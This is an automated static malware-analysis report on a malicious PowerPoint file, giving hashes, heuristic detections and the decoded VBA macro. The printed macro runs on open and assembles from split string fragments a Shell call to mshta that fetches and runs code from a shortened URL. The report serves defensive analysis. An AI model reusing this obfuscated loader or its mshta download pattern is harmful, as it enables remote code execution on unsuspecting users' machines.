Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 171a5bfa51af9b2b…

MALICIOUS

Office (OOXML)

11.9 KB First seen: 2021-05-04
MD5: d3d43ca9321ae94069515eae5a901c7b SHA-1: cca71423c9a3ca3ee041ed692766a3dbd73e3a25 SHA-256: 171a5bfa51af9b2be16780bfe95960c111d4dd96b7b3ccc5a63c30919774d7ba
152 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell _
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    Shell _
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • VBA project signed with a self-signed certificate info OLE_VBA_SIGNATURE_SELF_SIGNED
    The VBA project is signed, but the signing certificate is self-signed (issuer equals subject) — no certificate authority vouches for the signer. Self-signed VBA signing is the common trick to make a macro project appear signed/trusted without a real publisher identity.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.google.com In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas🔏 Self-signedVBA project digital signature
Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 796 bytes
SHA-256: a36be5ebbdc178b80fd0a54a5c33030666ccb31e9c93ab33acca8937adea199c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module"
Sub Auto_Open()
Dim calc As New polar

p_ = calc _
.computer + calc _
.computer2 + calc _
.computer3



Shell _
p_



End Sub

Attribute VB_Name = "polar"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Property Get computer() As String
computer = "m" + "s" + "h" + "t" + "a h"
End Property
Public Property Get computer2() As String
computer2 = "t" + "t" + "p" + ":" + "/" + "/" + "w" + "w" + "w"
End Property
Public Property Get computer3() As String
computer3 = ".j.mp/untaleesdasoijesjdw"
End Property
vbaProject_00.bin🔏 Self-signedVBA project digital signature
Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.		 vba-project OOXML VBA project: ppt/vbaProject.bin 23040 bytes
SHA-256: 7332c1c3d4734b74ed6fc725970b67c5c931c8f63aff13d9dcc9e450489dfbf0

Open this report in the interactive analyzer, or submit your own file for analysis.